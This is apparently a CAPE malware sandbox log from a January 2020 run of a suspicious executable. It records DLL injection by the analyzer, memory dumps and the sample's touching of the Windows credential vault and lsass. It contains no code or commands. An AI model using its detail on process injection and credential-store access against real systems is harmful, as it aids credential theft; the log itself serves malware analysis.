Analysis

Category Package Started Completed Duration Options Log
FILE Extraction 2020-01-14 13:45:20 2020-01-14 13:49:14 234 seconds Show Options Show Log
route = internet
procdump = 0
2020-01-14 13:45:22,000 [root] INFO: Date set to: 01-14-20, time set to: 13:45:22, timeout set to: 200
2020-01-14 13:45:22,108 [root] DEBUG: Starting analyzer from: C:\vtfynxjgxy
2020-01-14 13:45:22,108 [root] DEBUG: Storing results at: C:\FfIKSGRI
2020-01-14 13:45:22,108 [root] DEBUG: Pipe server name: \\.\PIPE\TWHaMftf
2020-01-14 13:45:22,108 [root] INFO: Analysis package "Extraction" has been specified.
2020-01-14 13:45:24,979 [root] DEBUG: Started auxiliary module Browser
2020-01-14 13:45:24,994 [root] DEBUG: Started auxiliary module Curtain
2020-01-14 13:45:24,994 [modules.auxiliary.digisig] DEBUG: Checking for a digitial signature.
2020-01-14 13:45:26,601 [modules.auxiliary.digisig] DEBUG: File is not signed.
2020-01-14 13:45:26,601 [modules.auxiliary.digisig] INFO: Uploading signature results to aux/DigiSig.json
2020-01-14 13:45:26,601 [root] DEBUG: Started auxiliary module DigiSig
2020-01-14 13:45:26,601 [root] DEBUG: Started auxiliary module Disguise
2020-01-14 13:45:26,617 [root] DEBUG: Started auxiliary module Human
2020-01-14 13:45:26,617 [root] DEBUG: Started auxiliary module Screenshots
2020-01-14 13:45:26,617 [root] DEBUG: Started auxiliary module Sysmon
2020-01-14 13:45:26,617 [root] DEBUG: Started auxiliary module Usage
2020-01-14 13:45:26,617 [root] INFO: Analyzer: DLL set to Extraction.dll from package modules.packages.Extraction
2020-01-14 13:45:26,617 [root] INFO: Analyzer: DLL_64 set to Extraction_x64.dll from package modules.packages.Extraction
2020-01-14 13:45:26,632 [lib.api.process] INFO: Successfully executed process from path "C:\Users\user\AppData\Local\Temp\ThGUgOMMWUNV0z.exe" with arguments "" with pid 1520
2020-01-14 13:45:26,632 [lib.api.process] INFO: Option 'procdump' with value '0' sent to monitor
2020-01-14 13:45:26,632 [lib.api.process] INFO: 32-bit DLL to inject is C:\vtfynxjgxy\dll\sezCHK.dll, loader C:\vtfynxjgxy\bin\NCLoagX.exe
2020-01-14 13:45:26,632 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\TWHaMftf.
2020-01-14 13:45:26,648 [root] DEBUG: Loader: Injecting process 1520 (thread 1180) with C:\vtfynxjgxy\dll\sezCHK.dll.
2020-01-14 13:45:26,648 [root] DEBUG: Process image base: 0x00400000
2020-01-14 13:45:26,648 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\vtfynxjgxy\dll\sezCHK.dll.
2020-01-14 13:45:26,648 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2020-01-14 13:45:26,648 [root] DEBUG: Successfully injected DLL C:\vtfynxjgxy\dll\sezCHK.dll.
2020-01-14 13:45:26,648 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 1520
2020-01-14 13:45:28,676 [lib.api.process] INFO: Successfully resumed process with pid 1520
2020-01-14 13:45:28,676 [root] INFO: Added new process to list with pid: 1520
2020-01-14 13:45:28,816 [root] DEBUG: Terminate processes on terminate_event enabled.
2020-01-14 13:45:28,816 [root] DEBUG: Process dumps disabled.
2020-01-14 13:45:29,082 [root] DEBUG: RestoreHeaders: Restored original import table.
2020-01-14 13:45:29,082 [root] INFO: Disabling sleep skipping.
2020-01-14 13:45:29,082 [root] INFO: Disabling sleep skipping.
2020-01-14 13:45:29,082 [root] INFO: Disabling sleep skipping.
2020-01-14 13:45:29,082 [root] INFO: Disabling sleep skipping.
2020-01-14 13:45:29,082 [root] DEBUG: WoW64 detected: 64-bit ntdll base: 0x77a00000, KiUserExceptionDispatcher: 0x0, NtSetContextThread: 0x77a5124a, Wow64PrepareForException: 0x0
2020-01-14 13:45:29,082 [root] DEBUG: WoW64 workaround: KiUserExceptionDispatcher hook installed at: 0x300000
2020-01-14 13:45:29,082 [root] DEBUG: Debugger initialised.
2020-01-14 13:45:29,082 [root] DEBUG: CAPE initialised: 32-bit Extraction package loaded in process 1520 at 0x74ec0000, image base 0x400000, stack from 0x186000-0x190000
2020-01-14 13:45:29,082 [root] DEBUG: Commandline: C:\Users\user\AppData\Local\Temp\"C:\Users\user\AppData\Local\Temp\ThGUgOMMWUNV0z.exe".
2020-01-14 13:45:29,082 [root] DEBUG: AddTrackedRegion: GetTrackedRegion(0x00400000) returned 0x00000000.
2020-01-14 13:45:29,082 [root] DEBUG: AddTrackedRegion: Created new tracked region: TrackedRegion->AllocationBase 0x00000000.
2020-01-14 13:45:29,082 [root] DEBUG: AddTrackedRegion: VirtualQuery(0x00400000) -> AllocationBase 0x00400000 RegionSize 0x4096.
2020-01-14 13:45:29,082 [root] DEBUG: AddTrackedRegion: EntryPoint 0x7d348, Entropy 6.803339e+00
2020-01-14 13:45:29,082 [root] DEBUG: AddTrackedRegion: New region at 0x00400000 size 0x1000 added to tracked regions.
2020-01-14 13:45:29,082 [root] DEBUG: ExtractionInit: Adding main image base to tracked regions.
2020-01-14 13:45:29,082 [root] INFO: Monitor successfully loaded in process with pid 1520.
2020-01-14 13:45:29,176 [root] DEBUG: Allocation: 0x00310000 - 0x00311000, size: 0x1000, protection: 0x40.
2020-01-14 13:45:29,190 [root] DEBUG: ProcessTrackedRegions: Processing region at 0x00000000.
2020-01-14 13:45:29,190 [root] DEBUG: ProcessTrackedRegions: Processing region at 0x00400000.
2020-01-14 13:45:29,190 [root] DEBUG: ProcessImageBase: EP 0x0007D348 image base 0x00400000 size 0x0 entropy 6.811265e+00.
2020-01-14 13:45:29,190 [root] DEBUG: AllocationHandler: Adding allocation to tracked region list: 0x00310000, size: 0x1000.
2020-01-14 13:45:29,207 [root] DEBUG: AddTrackedRegion: GetTrackedRegion(0x00310000) returned 0x00000000.
2020-01-14 13:45:29,207 [root] DEBUG: AddTrackedRegion: Created new tracked region: TrackedRegion->AllocationBase 0x00000000.
2020-01-14 13:45:29,207 [root] DEBUG: AddTrackedRegion: VirtualQuery(0x00310000) -> AllocationBase 0x00310000 RegionSize 0x4096.
2020-01-14 13:45:29,207 [root] DEBUG: AddTrackedRegion: New region at 0x00310000 size 0x1000 added to tracked regions.
2020-01-14 13:45:39,283 [root] DEBUG: ProtectionHandler: Address 0x00477075 already in tracked region at 0x00400000, size 0x1000
2020-01-14 13:45:39,283 [root] DEBUG: ProtectionHandler: Address: 0x00477075 (alloc base 0x00400000), NumberOfBytesToProtect: 0x5d88, NewAccessProtection: 0x40
2020-01-14 13:45:39,283 [root] DEBUG: ProtectionHandler: Increased region size at 0x00477075 to 0x7cdfd.
2020-01-14 13:45:39,283 [root] DEBUG: ProtectionHandler: Updated region protection at 0x00477075 to 0x40.
2020-01-14 13:45:39,299 [root] DEBUG: ProcessImageBase: EP 0x0007D348 image base 0x00400000 size 0x0 entropy 6.812066e+00.
2020-01-14 13:45:39,299 [root] DEBUG: Allocation: 0x003F0000 - 0x003F1000, size: 0x1000, protection: 0x40.
2020-01-14 13:45:39,299 [root] DEBUG: ProcessTrackedRegions: Processing region at 0x00000000.
2020-01-14 13:45:39,299 [root] DEBUG: ProcessTrackedRegions: Processing region at 0x00400000.
2020-01-14 13:45:39,315 [root] DEBUG: ProcessImageBase: EP 0x0007D348 image base 0x00400000 size 0x0 entropy 6.768053e+00.
2020-01-14 13:45:39,315 [root] DEBUG: ProcessTrackedRegions: Processing region at 0x00310000.
2020-01-14 13:45:39,315 [root] DEBUG: AllocationHandler: Adding allocation to tracked region list: 0x003F0000, size: 0x1000.
2020-01-14 13:45:39,315 [root] DEBUG: AddTrackedRegion: GetTrackedRegion(0x003F0000) returned 0x00000000.
2020-01-14 13:45:39,315 [root] DEBUG: AddTrackedRegion: Created new tracked region: TrackedRegion->AllocationBase 0x00000000.
2020-01-14 13:45:39,315 [root] DEBUG: AddTrackedRegion: VirtualQuery(0x003F0000) -> AllocationBase 0x003F0000 RegionSize 0x4096.
2020-01-14 13:45:39,331 [root] DEBUG: AddTrackedRegion: New region at 0x003F0000 size 0x1000 added to tracked regions.
2020-01-14 13:45:39,799 [root] DEBUG: set_caller_info: Adding region at 0x003F0000 to caller regions list (ntdll::memcpy).
2020-01-14 13:45:39,799 [root] DEBUG: set_caller_info: Caller at 0x003F001A in tracked regions.
2020-01-14 13:45:39,799 [root] DEBUG: ProcessTrackedRegions: Processing region at 0x00000000.
2020-01-14 13:45:39,799 [root] DEBUG: ProcessTrackedRegions: Processing region at 0x00400000.
2020-01-14 13:45:39,799 [root] DEBUG: ProcessImageBase: EP 0x0007D348 image base 0x00400000 size 0x0 entropy 6.768053e+00.
2020-01-14 13:45:39,799 [root] DEBUG: ProcessTrackedRegions: Processing region at 0x00310000.
2020-01-14 13:45:39,799 [root] DEBUG: ProcessTrackedRegions: Processing region at 0x003F0000.
2020-01-14 13:45:39,799 [root] DEBUG: DumpPEsInRange: Scanning range 0x3f0000 - 0x3f1000.
2020-01-14 13:45:39,799 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x3f0000-0x3f1000.
2020-01-14 13:45:39,799 [root] DEBUG: DumpPEsInTrackedRegion: No PE images found in range range 0x003F0000 - 0x003F1000.
2020-01-14 13:45:39,799 [root] DEBUG: set_caller_info: Adding region at 0x01D50000 to caller regions list (kernel32::GetSystemTime).
2020-01-14 13:45:39,799 [root] DEBUG: DumpPEsInRange: Scanning range 0x3f0000 - 0x3f1000.
2020-01-14 13:45:39,799 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x3f0000-0x3f1000.
2020-01-14 13:45:39,799 [root] DEBUG: DumpPEsInTrackedRegion: No PE images found in range range 0x003F0000 - 0x003F1000.
2020-01-14 13:45:39,829 [root] DEBUG: DumpMemory: CAPE output file C:\FfIKSGRI\CAPE\1520_67160458039251614212020 successfully created, size 0x1000
2020-01-14 13:45:39,829 [root] INFO: Added new CAPE file to list with path: C:\FfIKSGRI\CAPE\1520_67160458039251614212020
2020-01-14 13:45:39,845 [root] DEBUG: DumpRegion: Dumped stack region from 0x003F0000, size 0x1000.
2020-01-14 13:45:39,845 [root] DEBUG: ProcessTrackedRegion: dumped executable memory range at 0x003F0000.
2020-01-14 13:45:39,845 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoints in range 0x3f0000 - 0x3f1000.
2020-01-14 13:45:39,845 [root] DEBUG: DumpMemory: CAPE output file C:\FfIKSGRI\CAPE\1520_186718802039251614212020 successfully created, size 0x1000
2020-01-14 13:45:39,845 [root] INFO: Added new CAPE file to list with path: C:\FfIKSGRI\CAPE\1520_186718802039251614212020
2020-01-14 13:45:39,845 [root] DEBUG: DumpRegion: Dumped stack region from 0x003F0000, size 0x1000.
2020-01-14 13:45:39,845 [root] DEBUG: ProcessTrackedRegion: dumped executable memory range at 0x003F0000.
2020-01-14 13:45:39,845 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoints in range 0x3f0000 - 0x3f1000.
2020-01-14 13:45:39,877 [root] INFO: Announced 32-bit process name: ThGUgOMMWUNV0z.exe pid: 932
2020-01-14 13:45:39,892 [lib.api.process] INFO: Option 'procdump' with value '0' sent to monitor
2020-01-14 13:45:39,892 [lib.api.process] INFO: 32-bit DLL to inject is C:\vtfynxjgxy\dll\sezCHK.dll, loader C:\vtfynxjgxy\bin\NCLoagX.exe
2020-01-14 13:45:39,892 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\TWHaMftf.
2020-01-14 13:45:39,892 [root] DEBUG: Loader: Injecting process 932 (thread 1116) with C:\vtfynxjgxy\dll\sezCHK.dll.
2020-01-14 13:45:39,892 [root] DEBUG: Process image base: 0x00400000
2020-01-14 13:45:39,892 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\vtfynxjgxy\dll\sezCHK.dll.
2020-01-14 13:45:39,892 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2020-01-14 13:45:39,892 [root] DEBUG: Successfully injected DLL C:\vtfynxjgxy\dll\sezCHK.dll.
2020-01-14 13:45:39,892 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 932
2020-01-14 13:45:39,907 [root] DEBUG: DLL loaded at 0x75130000: C:\Windows\system32\apphelp (0x4c000 bytes).
2020-01-14 13:45:39,924 [root] DEBUG: DLL unloaded from 0x00400000.
2020-01-14 13:45:39,924 [root] INFO: Announced 32-bit process name: ThGUgOMMWUNV0z.exe pid: 932
2020-01-14 13:45:39,924 [lib.api.process] INFO: Option 'procdump' with value '0' sent to monitor
2020-01-14 13:45:39,924 [lib.api.process] INFO: 32-bit DLL to inject is C:\vtfynxjgxy\dll\sezCHK.dll, loader C:\vtfynxjgxy\bin\NCLoagX.exe
2020-01-14 13:45:39,940 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\TWHaMftf.
2020-01-14 13:45:39,940 [root] DEBUG: Loader: Injecting process 932 (thread 1116) with C:\vtfynxjgxy\dll\sezCHK.dll.
2020-01-14 13:45:39,940 [root] DEBUG: Process image base: 0x00400000
2020-01-14 13:45:39,940 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\vtfynxjgxy\dll\sezCHK.dll.
2020-01-14 13:45:39,940 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2020-01-14 13:45:39,940 [root] DEBUG: Successfully injected DLL C:\vtfynxjgxy\dll\sezCHK.dll.
2020-01-14 13:45:39,940 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 932
2020-01-14 13:45:39,940 [root] INFO: Announced 32-bit process name: ThGUgOMMWUNV0z.exe pid: 932
2020-01-14 13:45:39,940 [lib.api.process] INFO: Option 'procdump' with value '0' sent to monitor
2020-01-14 13:45:39,940 [lib.api.process] INFO: 32-bit DLL to inject is C:\vtfynxjgxy\dll\sezCHK.dll, loader C:\vtfynxjgxy\bin\NCLoagX.exe
2020-01-14 13:45:39,954 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\TWHaMftf.
2020-01-14 13:45:39,954 [root] DEBUG: Loader: Injecting process 932 (thread 0) with C:\vtfynxjgxy\dll\sezCHK.dll.
2020-01-14 13:45:39,954 [root] DEBUG: InjectDll: No thread ID supplied. Initial thread ID 1116, handle 0x9c
2020-01-14 13:45:39,954 [root] DEBUG: Process image base: 0x00400000
2020-01-14 13:45:39,954 [root] DEBUG: InjectDllViaIAT: Executable DOS header invalid.
2020-01-14 13:45:39,954 [root] DEBUG: Successfully injected DLL C:\vtfynxjgxy\dll\sezCHK.dll.
2020-01-14 13:45:39,954 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 932
2020-01-14 13:45:39,954 [root] INFO: Announced 32-bit process name: ThGUgOMMWUNV0z.exe pid: 932
2020-01-14 13:45:39,954 [lib.api.process] INFO: Option 'procdump' with value '0' sent to monitor
2020-01-14 13:45:39,954 [lib.api.process] INFO: 32-bit DLL to inject is C:\vtfynxjgxy\dll\sezCHK.dll, loader C:\vtfynxjgxy\bin\NCLoagX.exe
2020-01-14 13:45:39,970 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\TWHaMftf.
2020-01-14 13:45:39,970 [root] DEBUG: Loader: Injecting process 932 (thread 0) with C:\vtfynxjgxy\dll\sezCHK.dll.
2020-01-14 13:45:39,970 [root] DEBUG: InjectDll: No thread ID supplied. Initial thread ID 1116, handle 0x9c
2020-01-14 13:45:39,970 [root] DEBUG: Process image base: 0x00400000
2020-01-14 13:45:39,970 [root] DEBUG: InjectDllViaIAT: Modified EP detected, rebasing IAT patch to new image base 0x00400000 (context EP 0x0047D348)
2020-01-14 13:45:39,970 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\vtfynxjgxy\dll\sezCHK.dll.
2020-01-14 13:45:39,970 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2020-01-14 13:45:39,970 [root] DEBUG: Successfully injected DLL C:\vtfynxjgxy\dll\sezCHK.dll.
2020-01-14 13:45:39,986 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 932
2020-01-14 13:45:39,986 [root] INFO: Announced 32-bit process name: ThGUgOMMWUNV0z.exe pid: 932
2020-01-14 13:45:39,986 [lib.api.process] INFO: Option 'procdump' with value '0' sent to monitor
2020-01-14 13:45:39,986 [lib.api.process] INFO: 32-bit DLL to inject is C:\vtfynxjgxy\dll\sezCHK.dll, loader C:\vtfynxjgxy\bin\NCLoagX.exe
2020-01-14 13:45:39,986 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\TWHaMftf.
2020-01-14 13:45:39,986 [root] DEBUG: Loader: Injecting process 932 (thread 1116) with C:\vtfynxjgxy\dll\sezCHK.dll.
2020-01-14 13:45:39,986 [root] DEBUG: Process image base: 0x00400000
2020-01-14 13:45:39,986 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\vtfynxjgxy\dll\sezCHK.dll.
2020-01-14 13:45:39,986 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
2020-01-14 13:45:39,986 [root] DEBUG: Successfully injected DLL C:\vtfynxjgxy\dll\sezCHK.dll.
2020-01-14 13:45:39,986 [lib.api.process] INFO: Injected into suspended 32-bit process with pid 932
2020-01-14 13:45:40,002 [root] DEBUG: NtTerminateProcess hook: Processing tracked regions before shutdown (process 1520).
2020-01-14 13:45:40,002 [root] DEBUG: ProcessTrackedRegions: Processing region at 0x00000000.
2020-01-14 13:45:40,002 [root] DEBUG: ProcessTrackedRegions: Processing region at 0x00400000.
2020-01-14 13:45:40,002 [root] DEBUG: ProcessImageBase: EP 0x0007D348 image base 0x00400000 size 0x0 entropy 6.768053e+00.
2020-01-14 13:45:40,002 [root] DEBUG: ProcessTrackedRegions: Processing region at 0x00310000.
2020-01-14 13:45:40,002 [root] DEBUG: DumpPEsInRange: Scanning range 0x310000 - 0x311000.
2020-01-14 13:45:40,002 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x310000-0x311000.
2020-01-14 13:45:40,002 [root] DEBUG: DumpPEsInTrackedRegion: No PE images found in range range 0x00310000 - 0x00311000.
2020-01-14 13:45:40,002 [root] DEBUG: DumpPEsInRange: Scanning range 0x400000 - 0x47cdfd.
2020-01-14 13:45:40,002 [root] DEBUG: Terminate processes on terminate_event enabled.
2020-01-14 13:45:40,002 [root] DEBUG: ScanForDisguisedPE: PE image located at: 0x400000
2020-01-14 13:45:40,002 [root] DEBUG: Process dumps disabled.
2020-01-14 13:45:40,002 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2020-01-14 13:45:40,002 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x00400000.
2020-01-14 13:45:40,017 [root] INFO: Disabling sleep skipping.
2020-01-14 13:45:40,017 [root] DEBUG: DumpProcess: Module entry point VA is 0x0007D348.
2020-01-14 13:45:40,017 [root] DEBUG: DumpPEsInRange: Scanning range 0x400000 - 0x47cdfd.
2020-01-14 13:45:40,017 [root] DEBUG: ScanForDisguisedPE: PE image located at: 0x400000
2020-01-14 13:45:40,017 [root] DEBUG: DumpImageInCurrentProcess: Attempting to dump virtual PE image.
2020-01-14 13:45:40,017 [root] DEBUG: DumpProcess: Instantiating PeParser with address: 0x00400000.
2020-01-14 13:45:40,017 [root] DEBUG: DumpProcess: Module entry point VA is 0x0007D348.
2020-01-14 13:45:40,032 [root] DEBUG: RestoreHeaders: Restored original import table.
2020-01-14 13:45:40,032 [root] DEBUG: WoW64 detected: 64-bit ntdll base: 0x77a00000, KiUserExceptionDispatcher: 0x0, NtSetContextThread: 0x77a5124a, Wow64PrepareForException: 0x0
2020-01-14 13:45:40,032 [root] DEBUG: WoW64 workaround: KiUserExceptionDispatcher hook installed at: 0x3d0000
2020-01-14 13:45:40,049 [root] DEBUG: Debugger initialised.
2020-01-14 13:45:40,049 [root] INFO: Added new CAPE file to list with path: C:\FfIKSGRI\CAPE\1520_47717264440251614212020
2020-01-14 13:45:40,049 [root] DEBUG: CAPE initialised: 32-bit Extraction package loaded in process 932 at 0x74ec0000, image base 0x400000, stack from 0x186000-0x190000
2020-01-14 13:45:40,049 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x89a00.
2020-01-14 13:45:40,063 [root] DEBUG: Commandline: C:\Users\user\AppData\Local\Temp\"C:\Users\user\AppData\Local\Temp\ThGUgOMMWUNV0z.exe".
2020-01-14 13:45:40,063 [root] DEBUG: AddTrackedRegion: GetTrackedRegion(0x00400000) returned 0x00000000.
2020-01-14 13:45:40,063 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x400200-0x47cdfd.
2020-01-14 13:45:40,063 [root] DEBUG: AddTrackedRegion: Created new tracked region: TrackedRegion->AllocationBase 0x00000000.
2020-01-14 13:45:40,063 [root] DEBUG: DumpPEsInTrackedRegion: Dumped 1 PE image(s) from range 0x00400000 - 0x0047CDFD.
2020-01-14 13:45:40,063 [root] DEBUG: ProcessTrackedRegion: Found and dumped PE image(s) in range 0x00400000 - 0x0047CDFD.
2020-01-14 13:45:40,063 [root] DEBUG: AddTrackedRegion: VirtualQuery(0x00400000) -> AllocationBase 0x00400000 RegionSize 0x663552.
2020-01-14 13:45:40,063 [root] DEBUG: AddTrackedRegion: EntryPoint 0x139de, Entropy 1.393088e+00
2020-01-14 13:45:40,063 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoints in range 0x400000 - 0x47cdfd.
2020-01-14 13:45:40,079 [root] DEBUG: AddTrackedRegion: New region at 0x00400000 size 0xa2000 added to tracked regions.
2020-01-14 13:45:40,095 [root] DEBUG: ExtractionInit: Adding main image base to tracked regions.
2020-01-14 13:45:40,095 [root] INFO: Added new process to list with pid: 932
2020-01-14 13:45:40,095 [root] INFO: Monitor successfully loaded in process with pid 932.
2020-01-14 13:45:40,111 [root] INFO: Added new CAPE file to list with path: C:\FfIKSGRI\CAPE\1520_115079102440251614212020
2020-01-14 13:45:40,111 [root] DEBUG: DLL loaded at 0x759C0000: C:\Windows\syswow64\SHELL32 (0xc4a000 bytes).
2020-01-14 13:45:40,111 [root] DEBUG: DumpProcess: Module image dump success - dump size 0x89a00.
2020-01-14 13:45:40,127 [root] DEBUG: DLL loaded at 0x755F0000: C:\Windows\system32\CRYPTSP (0x16000 bytes).
2020-01-14 13:45:40,157 [root] DEBUG: ScanForDisguisedPE: No PE image located in range 0x400200-0x47cdfd.
2020-01-14 13:45:40,157 [root] DEBUG: DumpPEsInTrackedRegion: Dumped 1 PE image(s) from range 0x00400000 - 0x0047CDFD.
2020-01-14 13:45:40,157 [root] DEBUG: ProcessTrackedRegion: Found and dumped PE image(s) in range 0x00400000 - 0x0047CDFD.
2020-01-14 13:45:40,157 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoints in range 0x400000 - 0x47cdfd.
2020-01-14 13:45:40,174 [root] DEBUG: DumpMemory: CAPE output file C:\FfIKSGRI\CAPE\1520_61330587240251614212020 successfully created, size 0x1000
2020-01-14 13:45:40,204 [root] INFO: Added new CAPE file to list with path: C:\FfIKSGRI\CAPE\1520_61330587240251614212020
2020-01-14 13:45:40,220 [root] DEBUG: DumpRegion: Dumped stack region from 0x00310000, size 0x1000.
2020-01-14 13:45:40,220 [root] DEBUG: ProcessTrackedRegion: dumped executable memory range at 0x00310000.
2020-01-14 13:45:40,220 [root] DEBUG: ClearBreakpointsInRange: Clearing breakpoints in range 0x310000 - 0x311000.
2020-01-14 13:45:40,220 [root] DEBUG: ProcessTrackedRegions: Processing region at 0x003F0000.
2020-01-14 13:45:40,220 [root] DEBUG: DLL unloaded from 0x77780000.
2020-01-14 13:45:40,220 [root] DEBUG: NtTerminateProcess hook: Processing tracked regions before shutdown (process 1520).
2020-01-14 13:45:40,220 [root] DEBUG: ProcessTrackedRegions: Processing region at 0x00000000.
2020-01-14 13:45:40,220 [root] DEBUG: ProcessTrackedRegions: Processing region at 0x00400000.
2020-01-14 13:45:40,220 [root] DEBUG: DLL loaded at 0x755B0000: C:\Windows\system32\rsaenh (0x3b000 bytes).
2020-01-14 13:45:40,236 [root] DEBUG: ProcessImageBase: EP 0x0007D348 image base 0x00400000 size 0x0 entropy 6.768053e+00.
2020-01-14 13:45:40,236 [root] DEBUG: ProcessTrackedRegions: Processing region at 0x00310000.
2020-01-14 13:45:40,236 [root] DEBUG: ProcessTrackedRegions: Processing region at 0x003F0000.
2020-01-14 13:45:40,236 [root] INFO: Notified of termination of process with pid 1520.
2020-01-14 13:45:40,516 [root] DEBUG: DLL loaded at 0x74EB0000: C:\Windows\system32\vaultcli (0xc000 bytes).
2020-01-14 13:45:40,595 [root] DEBUG: DLL unloaded from 0x766D0000.
2020-01-14 13:45:40,720 [root] INFO: Announced starting service "VaultSvc"
2020-01-14 13:45:40,720 [root] INFO: Attaching to Service Control Manager (services.exe - pid 464)
2020-01-14 13:45:40,750 [lib.api.process] INFO: Option 'procdump' with value '0' sent to monitor
2020-01-14 13:45:40,750 [lib.api.process] INFO: 64-bit DLL to inject is C:\vtfynxjgxy\dll\ascwMn.dll, loader C:\vtfynxjgxy\bin\IXCtdmJe.exe
2020-01-14 13:45:40,766 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\TWHaMftf.
2020-01-14 13:45:40,766 [root] DEBUG: Loader: Injecting process 464 (thread 0) with C:\vtfynxjgxy\dll\ascwMn.dll.
2020-01-14 13:45:40,766 [root] DEBUG: InjectDll: No thread ID supplied. Initial thread ID 684, handle 0x84
2020-01-14 13:45:40,766 [root] DEBUG: Process image base: 0x00000000FF330000
2020-01-14 13:45:40,782 [root] DEBUG: InjectDllViaIAT: Not a new process, aborting IAT patch
2020-01-14 13:45:40,782 [root] DEBUG: InjectDll: IAT patching failed, falling back to thread injection.
2020-01-14 13:45:40,798 [root] DEBUG: Terminate processes on terminate_event enabled.
2020-01-14 13:45:40,798 [root] DEBUG: Process dumps disabled.
2020-01-14 13:45:40,812 [root] INFO: Disabling sleep skipping.
2020-01-14 13:45:40,844 [root] WARNING: Unable to place hook on LockResource
2020-01-14 13:45:40,859 [root] WARNING: Unable to hook LockResource
2020-01-14 13:45:40,921 [root] DEBUG: Debugger initialised.
2020-01-14 13:45:40,937 [root] DEBUG: CAPE initialised: 64-bit Extraction package loaded in process 464 at 0x0000000074DC0000, image base 0x00000000FF330000, stack from 0x0000000001DE6000-0x0000000001DF0000
2020-01-14 13:45:40,937 [root] DEBUG: Commandline: C:\Windows\sysnative\services.exe.
2020-01-14 13:45:40,937 [root] DEBUG: AddTrackedRegion: GetTrackedRegion(0x00000000FF330000) returned 0x0000000000000000.
2020-01-14 13:45:40,937 [root] DEBUG: AddTrackedRegion: Created new tracked region: TrackedRegion->AllocationBase 0x0000000000000000.
2020-01-14 13:45:40,953 [root] DEBUG: AddTrackedRegion: VirtualQuery(0x00000000FF330000) -> AllocationBase 0x00000000FF330000 RegionSize 0x4096.
2020-01-14 13:45:40,969 [root] DEBUG: AddTrackedRegion: EntryPoint 0x13310, Entropy 6.074161e+00
2020-01-14 13:45:40,969 [root] DEBUG: AddTrackedRegion: New region at 0x00000000FF330000 size 0x1000 added to tracked regions.
2020-01-14 13:45:40,984 [root] DEBUG: ExtractionInit: Adding main image base to tracked regions.
2020-01-14 13:45:40,984 [root] INFO: Added new process to list with pid: 464
2020-01-14 13:45:40,984 [root] INFO: Monitor successfully loaded in process with pid 464.
2020-01-14 13:45:40,984 [root] DEBUG: InjectDllViaThread: Successfully injected Dll into process via RtlCreateUserThread.
2020-01-14 13:45:40,984 [root] DEBUG: InjectDll: Successfully injected DLL via thread.
2020-01-14 13:45:40,984 [root] DEBUG: Successfully injected DLL C:\vtfynxjgxy\dll\ascwMn.dll.
2020-01-14 13:45:42,029 [root] INFO: Announced 64-bit process name: lsass.exe pid: 568
2020-01-14 13:45:42,029 [lib.api.process] INFO: Option 'procdump' with value '0' sent to monitor
2020-01-14 13:45:42,029 [lib.api.process] INFO: 64-bit DLL to inject is C:\vtfynxjgxy\dll\ascwMn.dll, loader C:\vtfynxjgxy\bin\IXCtdmJe.exe
2020-01-14 13:45:42,046 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\TWHaMftf.
2020-01-14 13:45:42,061 [root] DEBUG: Loader: Injecting process 568 (thread 812) with C:\vtfynxjgxy\dll\ascwMn.dll.
2020-01-14 13:45:42,076 [root] DEBUG: Process image base: 0x00000000FF1A0000
2020-01-14 13:45:42,092 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\vtfynxjgxy\dll\ascwMn.dll.
2020-01-14 13:45:42,092 [root] DEBUG: InjectDllViaIAT: Successfully patched IAT.
2020-01-14 13:45:42,092 [root] DEBUG: Successfully injected DLL C:\vtfynxjgxy\dll\ascwMn.dll.
2020-01-14 13:45:42,092 [lib.api.process] INFO: Injected into suspended 64-bit process with pid 568
2020-01-14 13:45:42,108 [root] INFO: Announced 64-bit process name: lsass.exe pid: 568
2020-01-14 13:45:42,108 [lib.api.process] INFO: Option 'procdump' with value '0' sent to monitor
2020-01-14 13:45:42,108 [lib.api.process] INFO: 64-bit DLL to inject is C:\vtfynxjgxy\dll\ascwMn.dll, loader C:\vtfynxjgxy\bin\IXCtdmJe.exe
2020-01-14 13:45:42,108 [root] DEBUG: ReadConfig: Successfully loaded pipe name \\.\PIPE\TWHaMftf.
2020-01-14 13:45:42,124 [root] DEBUG: Loader: Injecting process 568 (thread 812) with C:\vtfynxjgxy\dll\ascwMn.dll.
2020-01-14 13:45:42,124 [root] DEBUG: Process image base: 0x00000000FF1A0000
2020-01-14 13:45:42,138 [root] DEBUG: InjectDllViaIAT: IAT patching with dll name C:\vtfynxjgxy\dll\ascwMn.dll.
2020-01-14 13:45:42,154 [root] DEBUG: InjectDllViaIAT: This image has already been patched.
